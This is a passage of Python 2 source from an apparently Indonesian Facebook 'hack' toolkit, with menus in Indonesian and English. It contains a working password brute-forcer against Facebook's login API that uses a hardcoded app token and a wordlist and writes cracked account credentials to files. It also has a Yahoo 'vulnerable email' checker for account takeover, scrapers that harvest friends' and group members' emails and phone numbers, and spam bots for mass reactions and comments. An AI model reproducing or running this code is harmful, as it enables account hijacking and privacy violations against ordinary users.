print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
